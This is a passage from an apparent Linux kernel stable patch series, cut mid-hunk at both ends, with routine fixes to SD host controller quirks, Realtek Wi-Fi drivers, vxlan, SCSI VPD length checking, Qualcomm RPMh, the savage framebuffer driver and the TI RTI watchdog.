+ 	DMI_QUIRK_SD_NO_WRITE_PROTECT				= BIT(1),
++	DMI_QUIRK_SD_CD_ACTIVE_HIGH				= BIT(2),
++	DMI_QUIRK_SD_CD_ENABLE_PULL_UP				= BIT(3),
+ };
+ 
+ static inline void *sdhci_acpi_priv(struct sdhci_acpi_host *c)
+@@ -719,7 +722,28 @@ static const struct acpi_device_id sdhci_acpi_ids[] = {
+ };
+ MODULE_DEVICE_TABLE(acpi, sdhci_acpi_ids);
+ 
++/* Please keep this list sorted alphabetically */
+ static const struct dmi_system_id sdhci_acpi_quirks[] = {
++	{
++		/*
++		 * The Acer Aspire Switch 10 (SW5-012) microSD slot always
++		 * reports the card being write-protected even though microSD
++		 * cards do not have a write-protect switch at all.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "Aspire SW5-012"),
++		},
++		.driver_data = (void *)DMI_QUIRK_SD_NO_WRITE_PROTECT,
++	},
++	{
++		/* Asus T100TA, needs pull-up for cd but DSDT GpioInt has NoPull set */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "T100TA"),
++		},
++		.driver_data = (void *)DMI_QUIRK_SD_CD_ENABLE_PULL_UP,
++	},
+ 	{
+ 		/*
+ 		 * The Lenovo Miix 320-10ICR has a bug in the _PS0 method of
+@@ -736,15 +760,23 @@ static const struct dmi_system_id sdhci_acpi_quirks[] = {
+ 	},
+ 	{
+ 		/*
+-		 * The Acer Aspire Switch 10 (SW5-012) microSD slot always
+-		 * reports the card being write-protected even though microSD
+-		 * cards do not have a write-protect switch at all.
++		 * Lenovo Yoga Tablet 2 Pro 1380F/L (13" Android version) this
++		 * has broken WP reporting and an inverted CD signal.
++		 * Note this has more or less the same BIOS as the Lenovo Yoga
++		 * Tablet 2 830F/L or 1050F/L (8" and 10" Android), but unlike
++		 * the 830 / 1050 models which share the same mainboard this
++		 * model has a different mainboard and the inverted CD and
++		 * broken WP are unique to this board.
+ 		 */
+ 		.matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Acer"),
+-			DMI_MATCH(DMI_PRODUCT_NAME, "Aspire SW5-012"),
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corp."),
++			DMI_MATCH(DMI_PRODUCT_NAME, "VALLEYVIEW C0 PLATFORM"),
++			DMI_MATCH(DMI_BOARD_NAME, "BYT-T FFD8"),
++			/* Full match so as to NOT match the 830/1050 BIOS */
++			DMI_MATCH(DMI_BIOS_VERSION, "BLADE_21.X64.0005.R00.1504101516"),
+ 		},
+-		.driver_data = (void *)DMI_QUIRK_SD_NO_WRITE_PROTECT,
++		.driver_data = (void *)(DMI_QUIRK_SD_NO_WRITE_PROTECT |
++					DMI_QUIRK_SD_CD_ACTIVE_HIGH),
+ 	},
+ 	{
+ 		/*
+@@ -757,6 +789,17 @@ static const struct dmi_system_id sdhci_acpi_quirks[] = {
+ 		},
+ 		.driver_data = (void *)DMI_QUIRK_SD_NO_WRITE_PROTECT,
+ 	},
++	{
++		/*
++		 * The Toshiba WT10-A's microSD slot always reports the card being
++		 * write-protected.
++		 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "TOSHIBA"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "TOSHIBA WT10-A"),
++		},
++		.driver_data = (void *)DMI_QUIRK_SD_NO_WRITE_PROTECT,
++	},
+ 	{} /* Terminating entry */
+ };
+ 
+@@ -866,12 +909,18 @@ static int sdhci_acpi_probe(struct platform_device *pdev)
+ 	if (sdhci_acpi_flag(c, SDHCI_ACPI_SD_CD)) {
+ 		bool v = sdhci_acpi_flag(c, SDHCI_ACPI_SD_CD_OVERRIDE_LEVEL);
+ 
++		if (quirks & DMI_QUIRK_SD_CD_ACTIVE_HIGH)
++			host->mmc->caps2 |= MMC_CAP2_CD_ACTIVE_HIGH;
++
+ 		err = mmc_gpiod_request_cd(host->mmc, NULL, 0, v, 0);
+ 		if (err) {
+ 			if (err == -EPROBE_DEFER)
+ 				goto err_free;
+ 			dev_warn(dev, "failed to setup card detect gpio\n");
+ 			c->use_runtime_pm = false;
++		} else if (quirks & DMI_QUIRK_SD_CD_ENABLE_PULL_UP) {
++			mmc_gpiod_set_cd_config(host->mmc,
++						PIN_CONF_PACKED(PIN_CONFIG_BIAS_PULL_UP, 20000));
+ 		}
+ 
+ 		if (quirks & DMI_QUIRK_RESET_SD_SIGNAL_VOLT_ON_SUSP)
+diff --git a/drivers/mmc/host/sdhci.c b/drivers/mmc/host/sdhci.c
+index ad73d528a1bd4..111f7c6770605 100644
+--- a/drivers/mmc/host/sdhci.c
++++ b/drivers/mmc/host/sdhci.c
+@@ -3466,12 +3466,18 @@ static void sdhci_data_irq(struct sdhci_host *host, u32 intmask)
+ 		host->data->error = -EILSEQ;
+ 		if (!mmc_op_tuning(SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND))))
+ 			sdhci_err_stats_inc(host, DAT_CRC);
+-	} else if ((intmask & SDHCI_INT_DATA_CRC) &&
++	} else if ((intmask & (SDHCI_INT_DATA_CRC | SDHCI_INT_TUNING_ERROR)) &&
+ 		SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND))
+ 			!= MMC_BUS_TEST_R) {
+ 		host->data->error = -EILSEQ;
+ 		if (!mmc_op_tuning(SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND))))
+ 			sdhci_err_stats_inc(host, DAT_CRC);
++		if (intmask & SDHCI_INT_TUNING_ERROR) {
++			u16 ctrl2 = sdhci_readw(host, SDHCI_HOST_CONTROL2);
++
++			ctrl2 &= ~SDHCI_CTRL_TUNED_CLK;
++			sdhci_writew(host, ctrl2, SDHCI_HOST_CONTROL2);
++		}
+ 	} else if (intmask & SDHCI_INT_ADMA_ERROR) {
+ 		pr_err("%s: ADMA error: 0x%08x\n", mmc_hostname(host->mmc),
+ 		       intmask);
+@@ -4006,7 +4012,7 @@ bool sdhci_cqe_irq(struct sdhci_host *host, u32 intmask, int *cmd_error,
+ 	} else
+ 		*cmd_error = 0;
+ 
+-	if (intmask & (SDHCI_INT_DATA_END_BIT | SDHCI_INT_DATA_CRC)) {
++	if (intmask & (SDHCI_INT_DATA_END_BIT | SDHCI_INT_DATA_CRC | SDHCI_INT_TUNING_ERROR)) {
+ 		*data_error = -EILSEQ;
+ 		if (!mmc_op_tuning(SDHCI_GET_CMD(sdhci_readw(host, SDHCI_COMMAND))))
+ 			sdhci_err_stats_inc(host, DAT_CRC);
+diff --git a/drivers/mmc/host/sdhci.h b/drivers/mmc/host/sdhci.h
+index 5ce7cdcc192fd..901482d5e73f7 100644
+--- a/drivers/mmc/host/sdhci.h
++++ b/drivers/mmc/host/sdhci.h
+@@ -151,6 +151,7 @@
+ #define  SDHCI_INT_BUS_POWER	0x00800000
+ #define  SDHCI_INT_AUTO_CMD_ERR	0x01000000
+ #define  SDHCI_INT_ADMA_ERROR	0x02000000
++#define  SDHCI_INT_TUNING_ERROR	0x04000000
+ 
+ #define  SDHCI_INT_NORMAL_MASK	0x00007FFF
+ #define  SDHCI_INT_ERROR_MASK	0xFFFF8000
+@@ -162,7 +163,7 @@
+ 		SDHCI_INT_DATA_AVAIL | SDHCI_INT_SPACE_AVAIL | \
+ 		SDHCI_INT_DATA_TIMEOUT | SDHCI_INT_DATA_CRC | \
+ 		SDHCI_INT_DATA_END_BIT | SDHCI_INT_ADMA_ERROR | \
+-		SDHCI_INT_BLK_GAP)
++		SDHCI_INT_BLK_GAP | SDHCI_INT_TUNING_ERROR)
+ #define SDHCI_INT_ALL_MASK	((unsigned int)-1)
+ 
+ #define SDHCI_CQE_INT_ERR_MASK ( \
+diff --git a/drivers/net/vxlan/vxlan_core.c b/drivers/net/vxlan/vxlan_core.c
+index 01ce289f4abf0..a7ae68f490c4c 100644
+--- a/drivers/net/vxlan/vxlan_core.c
++++ b/drivers/net/vxlan/vxlan_core.c
+@@ -1662,10 +1662,6 @@ static bool vxlan_set_mac(struct vxlan_dev *vxlan,
+ 	if (ether_addr_equal(eth_hdr(skb)->h_source, vxlan->dev->dev_addr))
+ 		return false;
+ 
+-	/* Ignore packets from invalid src-address */
+-	if (!is_valid_ether_addr(eth_hdr(skb)->h_source))
+-		return false;
+-
+ 	/* Get address from the outer IP header */
+ 	if (vxlan_get_sk_family(vs) == AF_INET) {
+ 		saddr.sin.sin_addr.s_addr = ip_hdr(skb)->saddr;
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index ccac47dd781d6..9ccf8550a0679 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -1389,13 +1389,13 @@ rtl8xxxu_gen1_set_tx_power(struct rtl8xxxu_priv *priv, int channel, bool ht40)
+ 	u8 cck[RTL8723A_MAX_RF_PATHS], ofdm[RTL8723A_MAX_RF_PATHS];
+ 	u8 ofdmbase[RTL8723A_MAX_RF_PATHS], mcsbase[RTL8723A_MAX_RF_PATHS];
+ 	u32 val32, ofdm_a, ofdm_b, mcs_a, mcs_b;
+-	u8 val8;
++	u8 val8, base;
+ 	int group, i;
+ 
+ 	group = rtl8xxxu_gen1_channel_to_group(channel);
+ 
+-	cck[0] = priv->cck_tx_power_index_A[group] - 1;
+-	cck[1] = priv->cck_tx_power_index_B[group] - 1;
++	cck[0] = priv->cck_tx_power_index_A[group];
++	cck[1] = priv->cck_tx_power_index_B[group];
+ 
+ 	if (priv->hi_pa) {
+ 		if (cck[0] > 0x20)
+@@ -1406,10 +1406,6 @@ rtl8xxxu_gen1_set_tx_power(struct rtl8xxxu_priv *priv, int channel, bool ht40)
+ 
+ 	ofdm[0] = priv->ht40_1s_tx_power_index_A[group];
+ 	ofdm[1] = priv->ht40_1s_tx_power_index_B[group];
+-	if (ofdm[0])
+-		ofdm[0] -= 1;
+-	if (ofdm[1])
+-		ofdm[1] -= 1;
+ 
+ 	ofdmbase[0] = ofdm[0] +	priv->ofdm_tx_power_index_diff[group].a;
+ 	ofdmbase[1] = ofdm[1] +	priv->ofdm_tx_power_index_diff[group].b;
+@@ -1498,20 +1494,19 @@ rtl8xxxu_gen1_set_tx_power(struct rtl8xxxu_priv *priv, int channel, bool ht40)
+ 
+ 	rtl8xxxu_write32(priv, REG_TX_AGC_A_MCS15_MCS12,
+ 			 mcs_a + power_base->reg_0e1c);
++	val8 = u32_get_bits(mcs_a + power_base->reg_0e1c, 0xff000000);
+ 	for (i = 0; i < 3; i++) {
+-		if (i != 2)
+-			val8 = (mcsbase[0] > 8) ? (mcsbase[0] - 8) : 0;
+-		else
+-			val8 = (mcsbase[0] > 6) ? (mcsbase[0] - 6) : 0;
++		base = i != 2 ? 8 : 6;
++		val8 = max_t(int, val8 - base, 0);
+ 		rtl8xxxu_write8(priv, REG_OFDM0_XC_TX_IQ_IMBALANCE + i, val8);
+ 	}
++
+ 	rtl8xxxu_write32(priv, REG_TX_AGC_B_MCS15_MCS12,
+ 			 mcs_b + power_base->reg_0868);
++	val8 = u32_get_bits(mcs_b + power_base->reg_0868, 0xff000000);
+ 	for (i = 0; i < 3; i++) {
+-		if (i != 2)
+-			val8 = (mcsbase[1] > 8) ? (mcsbase[1] - 8) : 0;
+-		else
+-			val8 = (mcsbase[1] > 6) ? (mcsbase[1] - 6) : 0;
++		base = i != 2 ? 8 : 6;
++		val8 = max_t(int, val8 - base, 0);
+ 		rtl8xxxu_write8(priv, REG_OFDM0_XD_TX_IQ_IMBALANCE + i, val8);
+ 	}
+ }
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
+index d835a27429f0f..56b5cd032a9ac 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/phy.c
+@@ -892,8 +892,8 @@ static u8 _rtl92c_phy_get_rightchnlplace(u8 chnl)
+ 	u8 place = chnl;
+ 
+ 	if (chnl > 14) {
+-		for (place = 14; place < ARRAY_SIZE(channel5g); place++) {
+-			if (channel5g[place] == chnl) {
++		for (place = 14; place < ARRAY_SIZE(channel_all); place++) {
++			if (channel_all[place] == chnl) {
+ 				place++;
+ 				break;
+ 			}
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.c b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.c
+index 807b66c16e111..b1456fb921c2f 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.c
+@@ -35,7 +35,7 @@ static long _rtl92de_translate_todbm(struct ieee80211_hw *hw,
+ 
+ static void _rtl92de_query_rxphystatus(struct ieee80211_hw *hw,
+ 				       struct rtl_stats *pstats,
+-				       struct rx_desc_92d *pdesc,
++				       __le32 *pdesc,
+ 				       struct rx_fwinfo_92d *p_drvinfo,
+ 				       bool packet_match_bssid,
+ 				       bool packet_toself,
+@@ -49,8 +49,10 @@ static void _rtl92de_query_rxphystatus(struct ieee80211_hw *hw,
+ 	u8 i, max_spatial_stream;
+ 	u32 rssi, total_rssi = 0;
+ 	bool is_cck_rate;
++	u8 rxmcs;
+ 
+-	is_cck_rate = RX_HAL_IS_CCK_RATE(pdesc->rxmcs);
++	rxmcs = get_rx_desc_rxmcs(pdesc);
++	is_cck_rate = rxmcs <= DESC_RATE11M;
+ 	pstats->packet_matchbssid = packet_match_bssid;
+ 	pstats->packet_toself = packet_toself;
+ 	pstats->packet_beacon = packet_beacon;
+@@ -158,8 +160,8 @@ static void _rtl92de_query_rxphystatus(struct ieee80211_hw *hw,
+ 		pstats->rx_pwdb_all = pwdb_all;
+ 		pstats->rxpower = rx_pwr_all;
+ 		pstats->recvsignalpower = rx_pwr_all;
+-		if (pdesc->rxht && pdesc->rxmcs >= DESC_RATEMCS8 &&
+-		    pdesc->rxmcs <= DESC_RATEMCS15)
++		if (get_rx_desc_rxht(pdesc) && rxmcs >= DESC_RATEMCS8 &&
++		    rxmcs <= DESC_RATEMCS15)
+ 			max_spatial_stream = 2;
+ 		else
+ 			max_spatial_stream = 1;
+@@ -365,7 +367,7 @@ static void _rtl92de_process_phyinfo(struct ieee80211_hw *hw,
+ static void _rtl92de_translate_rx_signal_stuff(struct ieee80211_hw *hw,
+ 					       struct sk_buff *skb,
+ 					       struct rtl_stats *pstats,
+-					       struct rx_desc_92d *pdesc,
++					       __le32 *pdesc,
+ 					       struct rx_fwinfo_92d *p_drvinfo)
+ {
+ 	struct rtl_mac *mac = rtl_mac(rtl_priv(hw));
+@@ -414,7 +416,8 @@ bool rtl92de_rx_query_desc(struct ieee80211_hw *hw,	struct rtl_stats *stats,
+ 	stats->icv = (u16)get_rx_desc_icv(pdesc);
+ 	stats->crc = (u16)get_rx_desc_crc32(pdesc);
+ 	stats->hwerror = (stats->crc | stats->icv);
+-	stats->decrypted = !get_rx_desc_swdec(pdesc);
++	stats->decrypted = !get_rx_desc_swdec(pdesc) &&
++			   get_rx_desc_enc_type(pdesc) != RX_DESC_ENC_NONE;
+ 	stats->rate = (u8)get_rx_desc_rxmcs(pdesc);
+ 	stats->shortpreamble = (u16)get_rx_desc_splcp(pdesc);
+ 	stats->isampdu = (bool)(get_rx_desc_paggr(pdesc) == 1);
+@@ -427,8 +430,6 @@ bool rtl92de_rx_query_desc(struct ieee80211_hw *hw,	struct rtl_stats *stats,
+ 	rx_status->band = hw->conf.chandef.chan->band;
+ 	if (get_rx_desc_crc32(pdesc))
+ 		rx_status->flag |= RX_FLAG_FAILED_FCS_CRC;
+-	if (!get_rx_desc_swdec(pdesc))
+-		rx_status->flag |= RX_FLAG_DECRYPTED;
+ 	if (get_rx_desc_bw(pdesc))
+ 		rx_status->bw = RATE_INFO_BW_40;
+ 	if (get_rx_desc_rxht(pdesc))
+@@ -442,9 +443,7 @@ bool rtl92de_rx_query_desc(struct ieee80211_hw *hw,	struct rtl_stats *stats,
+ 	if (phystatus) {
+ 		p_drvinfo = (struct rx_fwinfo_92d *)(skb->data +
+ 						     stats->rx_bufshift);
+-		_rtl92de_translate_rx_signal_stuff(hw,
+-						   skb, stats,
+-						   (struct rx_desc_92d *)pdesc,
++		_rtl92de_translate_rx_signal_stuff(hw, skb, stats, pdesc,
+ 						   p_drvinfo);
+ 	}
+ 	/*rx_status->qual = stats->signal; */
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.h b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.h
+index d01578875cd5f..eb3f768140b5b 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.h
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8192de/trx.h
+@@ -14,6 +14,15 @@
+ #define USB_HWDESC_HEADER_LEN			32
+ #define CRCLENGTH				4
+ 
++enum rtl92d_rx_desc_enc {
++	RX_DESC_ENC_NONE	= 0,
++	RX_DESC_ENC_WEP40	= 1,
++	RX_DESC_ENC_TKIP_WO_MIC	= 2,
++	RX_DESC_ENC_TKIP_MIC	= 3,
++	RX_DESC_ENC_AES		= 4,
++	RX_DESC_ENC_WEP104	= 5,
++};
++
+ /* macros to read/write various fields in RX or TX descriptors */
+ 
+ static inline void set_tx_desc_pkt_size(__le32 *__pdesc, u32 __val)
+@@ -246,6 +255,11 @@ static inline u32 get_rx_desc_drv_info_size(__le32 *__pdesc)
+ 	return le32_get_bits(*__pdesc, GENMASK(19, 16));
+ }
+ 
++static inline u32 get_rx_desc_enc_type(__le32 *__pdesc)
++{
++	return le32_get_bits(*__pdesc, GENMASK(22, 20));
++}
++
+ static inline u32 get_rx_desc_shift(__le32 *__pdesc)
+ {
+ 	return le32_get_bits(*__pdesc, GENMASK(25, 24));
+@@ -380,10 +394,17 @@ struct rx_fwinfo_92d {
+ 	u8 csi_target[2];
+ 	u8 sigevm;
+ 	u8 max_ex_pwr;
++#ifdef __LITTLE_ENDIAN
+ 	u8 ex_intf_flag:1;
+ 	u8 sgi_en:1;
+ 	u8 rxsc:2;
+ 	u8 reserve:4;
++#else
++	u8 reserve:4;
++	u8 rxsc:2;
++	u8 sgi_en:1;
++	u8 ex_intf_flag:1;
++#endif
+ } __packed;
+ 
+ struct tx_desc_92d {
+@@ -488,64 +509,6 @@ struct tx_desc_92d {
+ 	u32 reserve_pass_pcie_mm_limit[4];
+ } __packed;
+ 
+-struct rx_desc_92d {
+-	u32 length:14;
+-	u32 crc32:1;
+-	u32 icverror:1;
+-	u32 drv_infosize:4;
+-	u32 security:3;
+-	u32 qos:1;
+-	u32 shift:2;
+-	u32 phystatus:1;
+-	u32 swdec:1;
+-	u32 lastseg:1;
+-	u32 firstseg:1;
+-	u32 eor:1;
+-	u32 own:1;
+-
+-	u32 macid:5;
+-	u32 tid:4;
+-	u32 hwrsvd:5;
+-	u32 paggr:1;
+-	u32 faggr:1;
+-	u32 a1_fit:4;
+-	u32 a2_fit:4;
+-	u32 pam:1;
+-	u32 pwr:1;
+-	u32 moredata:1;
+-	u32 morefrag:1;
+-	u32 type:2;
+-	u32 mc:1;
+-	u32 bc:1;
+-
+-	u32 seq:12;
+-	u32 frag:4;
+-	u32 nextpktlen:14;
+-	u32 nextind:1;
+-	u32 rsvd:1;
+-
+-	u32 rxmcs:6;
+-	u32 rxht:1;
+-	u32 amsdu:1;
+-	u32 splcp:1;
+-	u32 bandwidth:1;
+-	u32 htc:1;
+-	u32 tcpchk_rpt:1;
+-	u32 ipcchk_rpt:1;
+-	u32 tcpchk_valid:1;
+-	u32 hwpcerr:1;
+-	u32 hwpcind:1;
+-	u32 iv0:16;
+-
+-	u32 iv1;
+-
+-	u32 tsfl;
+-
+-	u32 bufferaddress;
+-	u32 bufferaddress64;
+-
+-} __packed;
+-
+ void rtl92de_tx_fill_desc(struct ieee80211_hw *hw,
+ 			  struct ieee80211_hdr *hdr, u8 *pdesc,
+ 			  u8 *pbd_desc_tx, struct ieee80211_tx_info *info,
+diff --git a/drivers/net/wireless/realtek/rtw89/mac80211.c b/drivers/net/wireless/realtek/rtw89/mac80211.c
+index a8f478f0cde90..3a108b13aa596 100644
+--- a/drivers/net/wireless/realtek/rtw89/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw89/mac80211.c
+@@ -263,7 +263,7 @@ static u8 rtw89_aifsn_to_aifs(struct rtw89_dev *rtwdev,
+ 	u8 sifs;
+ 
+ 	slot_time = vif->bss_conf.use_short_slot ? 9 : 20;
+-	sifs = chan->band_type == RTW89_BAND_5G ? 16 : 10;
++	sifs = chan->band_type == RTW89_BAND_2G ? 10 : 16;
+ 
+ 	return aifsn * slot_time + sifs;
+ }
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.c b/drivers/net/wireless/realtek/rtw89/pci.c
+index 4a012962cd441..58b6f7d4cab8b 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.c
++++ b/drivers/net/wireless/realtek/rtw89/pci.c
+@@ -948,7 +948,8 @@ u32 __rtw89_pci_check_and_reclaim_tx_resource_noio(struct rtw89_dev *rtwdev,
+ 
+ 	spin_lock_bh(&rtwpci->trx_lock);
+ 	cnt = rtw89_pci_get_avail_txbd_num(tx_ring);
+-	cnt = min(cnt, wd_ring->curr_num);
++	if (txch != RTW89_TXCH_CH12)
++		cnt = min(cnt, wd_ring->curr_num);
+ 	spin_unlock_bh(&rtwpci->trx_lock);
+ 
+ 	return cnt;
+diff --git a/drivers/s390/crypto/ap_bus.c b/drivers/s390/crypto/ap_bus.c
+index 4c0f9fe1ba779..c692b55dd1169 100644
+--- a/drivers/s390/crypto/ap_bus.c
++++ b/drivers/s390/crypto/ap_bus.c
+@@ -1088,7 +1088,7 @@ static int hex2bitmap(const char *str, unsigned long *bitmap, int bits)
+  */
+ static int modify_bitmap(const char *str, unsigned long *bitmap, int bits)
+ {
+-	int a, i, z;
++	unsigned long a, i, z;
+ 	char *np, sign;
+ 
+ 	/* bits needs to be a multiple of 8 */
+diff --git a/drivers/scsi/scsi.c b/drivers/scsi/scsi.c
+index e70ab8db30142..7b79cd435d7ab 100644
+--- a/drivers/scsi/scsi.c
++++ b/drivers/scsi/scsi.c
+@@ -350,6 +350,13 @@ static int scsi_get_vpd_size(struct scsi_device *sdev, u8 page)
+ 		if (result < SCSI_VPD_HEADER_SIZE)
+ 			return 0;
+ 
++		if (result > sizeof(vpd)) {
++			dev_warn_once(&sdev->sdev_gendev,
++				      "%s: long VPD page 0 length: %d bytes\n",
++				      __func__, result);
++			result = sizeof(vpd);
++		}
++
+ 		result -= SCSI_VPD_HEADER_SIZE;
+ 		if (!memchr(&vpd[SCSI_VPD_HEADER_SIZE], page, result))
+ 			return 0;
+diff --git a/drivers/soc/qcom/cmd-db.c b/drivers/soc/qcom/cmd-db.c
+index 629a7188b576f..2a7d089ec7270 100644
+--- a/drivers/soc/qcom/cmd-db.c
++++ b/drivers/soc/qcom/cmd-db.c
+@@ -1,6 +1,10 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-/* Copyright (c) 2016-2018, 2020, The Linux Foundation. All rights reserved. */
++/*
++ * Copyright (c) 2016-2018, 2020, The Linux Foundation. All rights reserved.
++ * Copyright (c) 2024, Qualcomm Innovation Center, Inc. All rights reserved.
++ */
+ 
++#include <linux/bitfield.h>
+ #include <linux/debugfs.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+@@ -17,6 +21,8 @@
+ #define MAX_SLV_ID		8
+ #define SLAVE_ID_MASK		0x7
+ #define SLAVE_ID_SHIFT		16
++#define SLAVE_ID(addr)		FIELD_GET(GENMASK(19, 16), addr)
++#define VRM_ADDR(addr)		FIELD_GET(GENMASK(19, 4), addr)
+ 
+ /**
+  * struct entry_header: header for each entry in cmddb
+@@ -220,6 +226,30 @@ const void *cmd_db_read_aux_data(const char *id, size_t *len)
+ }
+ EXPORT_SYMBOL(cmd_db_read_aux_data);
+ 
++/**
++ * cmd_db_match_resource_addr() - Compare if both Resource addresses are same
++ *
++ * @addr1: Resource address to compare
++ * @addr2: Resource address to compare
++ *
++ * Return: true if two addresses refer to the same resource, false otherwise
++ */
++bool cmd_db_match_resource_addr(u32 addr1, u32 addr2)
++{
++	/*
++	 * Each RPMh VRM accelerator resource has 3 or 4 contiguous 4-byte
++	 * aligned addresses associated with it. Ignore the offset to check
++	 * for VRM requests.
++	 */
++	if (addr1 == addr2)
++		return true;
++	else if (SLAVE_ID(addr1) == CMD_DB_HW_VRM && VRM_ADDR(addr1) == VRM_ADDR(addr2))
++		return true;
++
++	return false;
++}
++EXPORT_SYMBOL_GPL(cmd_db_match_resource_addr);
++
+ /**
+  * cmd_db_read_slave_id - Get the slave ID for a given resource address
+  *
+diff --git a/drivers/soc/qcom/rpmh-rsc.c b/drivers/soc/qcom/rpmh-rsc.c
+index 01c2f50cb97ef..5e7bb6338707d 100644
+--- a/drivers/soc/qcom/rpmh-rsc.c
++++ b/drivers/soc/qcom/rpmh-rsc.c
+@@ -1,6 +1,7 @@
+ // SPDX-License-Identifier: GPL-2.0
+ /*
+  * Copyright (c) 2016-2018, The Linux Foundation. All rights reserved.
++ * Copyright (c) 2023-2024, Qualcomm Innovation Center, Inc. All rights reserved.
+  */
+ 
+ #define pr_fmt(fmt) "%s " fmt, KBUILD_MODNAME
+@@ -519,7 +520,7 @@ static int check_for_req_inflight(struct rsc_drv *drv, struct tcs_group *tcs,
+ 		for_each_set_bit(j, &curr_enabled, MAX_CMDS_PER_TCS) {
+ 			addr = read_tcs_cmd(drv, RSC_DRV_CMD_ADDR, i, j);
+ 			for (k = 0; k < msg->num_cmds; k++) {
+-				if (addr == msg->cmds[k].addr)
++				if (cmd_db_match_resource_addr(msg->cmds[k].addr, addr))
+ 					return -EBUSY;
+ 			}
+ 		}
+diff --git a/drivers/thermal/qcom/lmh.c b/drivers/thermal/qcom/lmh.c
+index 4122a51e98741..97cf0dc3a6c38 100644
+--- a/drivers/thermal/qcom/lmh.c
++++ b/drivers/thermal/qcom/lmh.c
+@@ -95,6 +95,9 @@ static int lmh_probe(struct platform_device *pdev)
+ 	unsigned int enable_alg;
+ 	u32 node_id;
+ 
++	if (!qcom_scm_is_available())
++		return -EPROBE_DEFER;
++
+ 	lmh_data = devm_kzalloc(dev, sizeof(*lmh_data), GFP_KERNEL);
+ 	if (!lmh_data)
+ 		return -ENOMEM;
+diff --git a/drivers/video/fbdev/savage/savagefb_driver.c b/drivers/video/fbdev/savage/savagefb_driver.c
+index a7b63c475f954..78eee242fc992 100644
+--- a/drivers/video/fbdev/savage/savagefb_driver.c
++++ b/drivers/video/fbdev/savage/savagefb_driver.c
+@@ -2277,7 +2277,10 @@ static int savagefb_probe(struct pci_dev *dev, const struct pci_device_id *id)
+ 	if (info->var.xres_virtual > 0x1000)
+ 		info->var.xres_virtual = 0x1000;
+ #endif
+-	savagefb_check_var(&info->var, info);
++	err = savagefb_check_var(&info->var, info);
++	if (err)
++		goto failed;
++
+ 	savagefb_set_fix(info);
+ 
+ 	/*
+diff --git a/drivers/watchdog/rti_wdt.c b/drivers/watchdog/rti_wdt.c
+index ea617c0f97470..fe27039f6f5ae 100644
+--- a/drivers/watchdog/rti_wdt.c
++++ b/drivers/watchdog/rti_wdt.c
+@@ -52,6 +52,8 @@
+ 
+ #define DWDST			BIT(1)
+ 
++#define MAX_HW_ERROR		250
++
+ static int heartbeat = DEFAULT_HEARTBEAT;
+ 
+ /*
+@@ -90,7 +92,7 @@ static int rti_wdt_start(struct watchdog_device *wdd)
+ 	 * to be 50% or less than that; we obviouly want to configure the open
+ 	 * window as large as possible so we select the 50% option.
+ 	 */
+-	wdd->min_hw_heartbeat_ms = 500 * wdd->timeout;
++	wdd->min_hw_heartbeat_ms = 520 * wdd->timeout + MAX_HW_ERROR;
+ 
+ 	/* Generate NMI when wdt expires */
+ 	writel_relaxed(RTIWWDRX_NMI, wdt->base + RTIWWDRXCTRL);
+@@ -124,31 +126,33 @@ static int rti_wdt_setup_hw_hb(struct watchdog_device *wdd, u32 wsize)
+ 	 * be petted during the open window; not too early or not too late.
+ 	 * The HW configuration options only allow for the open window size
+ 	 * to be 50% or less than that.
++	 * To avoid any glitches, we accommodate 2% + max hardware error
++	 * safety margin.
+ 	 */
+ 	switch (wsize) {
+ 	case RTIWWDSIZE_50P:
+-		/* 50% open window => 50% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 500 * heartbeat;
++		/* 50% open window => 52% min heartbeat */
++		wdd->min_hw_heartbeat_ms = 520 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	case RTIWWDSIZE_25P:
+-		/* 25% open window => 75% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 750 * heartbeat;
++		/* 25% open window => 77% min heartbeat */
++		wdd->min_hw_heartbeat_ms = 770 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	case RTIWWDSIZE_12P5:
+-		/* 12.5% open window => 87.5% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 875 * heartbeat;
++		/* 12.5% open window => 89.5% min heartbeat */
++		wdd->min_hw_heartbeat_ms = 895 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	case RTIWWDSIZE_6P25:
+-		/* 6.5% open window => 93.5% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 935 * heartbeat;
++		/* 6.5% open window => 95.5% min heartbeat */
